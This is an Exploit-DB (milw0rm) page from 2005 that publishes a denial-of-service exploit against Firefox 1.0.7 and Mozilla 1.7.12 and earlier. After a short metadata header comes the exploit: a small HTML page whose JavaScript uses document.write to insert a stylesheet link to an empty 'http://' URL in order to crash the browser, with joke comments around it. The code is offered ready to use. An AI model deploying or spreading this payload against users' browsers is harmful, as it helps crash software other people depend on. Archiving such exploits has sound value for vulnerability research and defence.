ad

Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit



EDB-ID: 1257 CVE: N/A OSVDB-ID: 20332
Author: Kubbo Published: 2005-10-17 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
<!-- Tested on Firefox <= 1.0.7
             Mozilla Browser <= 1.7.12 
                         /str0ke -->

<!-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. -->

<html>
	<script language="JavaScript">
		document.write('<link rel="stylesheet" href="http://">');
	</script>
</html>

<!-- Affects Firefox 1.0.7 and below. Adaras öron är farliga. -->

# milw0rm.com [2005-10-17]